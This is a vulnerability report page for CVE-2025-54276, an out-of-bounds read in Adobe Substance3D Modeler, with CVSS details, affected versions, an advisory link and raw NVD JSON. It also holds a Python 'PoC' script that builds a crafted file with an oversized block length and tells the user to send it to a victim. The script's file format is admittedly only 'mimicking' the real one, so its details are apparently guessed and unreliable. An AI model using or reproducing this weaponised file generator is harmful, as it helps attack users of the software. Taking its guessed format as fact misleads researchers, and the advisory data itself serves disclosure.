Security Vulnerability Report
CVE-2025-54276 CVSS 7.8 HIGH

CVE-2025-54276

Published: 2025-10-14 20:15:38
Last Modified: 2025-10-17 14:52:16

Description

Substance3D - Modeler versions 1.22.3 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:* - VULNERABLE
Adobe Substance3D Modeler <= 1.22.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-54276 - Adobe Substance3D Modeler Out-of-Bounds Read PoC
# This PoC demonstrates the concept of triggering an out-of-bounds read
# by crafting a malicious file with abnormal offset/length values.
import struct
import sys


def create_malicious_modeler_file(output_path):
    """
    Create a crafted file that triggers out-of-bounds read
    in Substance3D Modeler <= 1.22.3
    """
    # File header - mimicking a 3D model file format
    header = b'SBSM'                 # Magic bytes for Substance3D Modeler file
    header += struct.pack('<I', 1)   # Version
    header += struct.pack('<I', 0)   # Flags

    # Malicious data block with oversized length to trigger OOB read
    block_type = struct.pack('<I', 0x4D455348)  # 'MESH' block type

    # Intentionally set an abnormally large data length
    # This will cause the parser to read past the allocated buffer
    malicious_length = struct.pack('<I', 0xFFFFFF00)  # Oversized length value

    # Normal-looking mesh data (small actual payload)
    mesh_data = b'\x00' * 64  # Small actual data

    # Combine to create the malicious file
    malicious_file = header + block_type + malicious_length + mesh_data

    with open(output_path, 'wb') as f:
        f.write(malicious_file)

    print(f"[+] Malicious file created: {output_path}")
    print(f"[+] File size: {len(malicious_file)} bytes")
    # Decode the packed little-endian field so the printed value matches 0xFFFFFF00
    print(f"[+] Malicious block length: 0x{struct.unpack('<I', malicious_length)[0]:08X}")
    print("[!] Send this file to a victim using Substance3D Modeler <= 1.22.3")
    print("[!] When opened, it will trigger out-of-bounds read")


if __name__ == "__main__":
    output = sys.argv[1] if len(sys.argv) > 1 else "malicious.sbs"
    create_malicious_modeler_file(output)
```

References

https://helpx.adobe.com/security/products/substance3d-modeler/apsb25-100.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54276", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:37.887", "lastModified": "2025-10-17T14:52:16.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Modeler versions 1.22.3 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.22.4", "matchCriteriaId": "E9633E88-E92B-4A01-A8E4-4F45BDD42C2F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d-modeler/apsb25-100.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}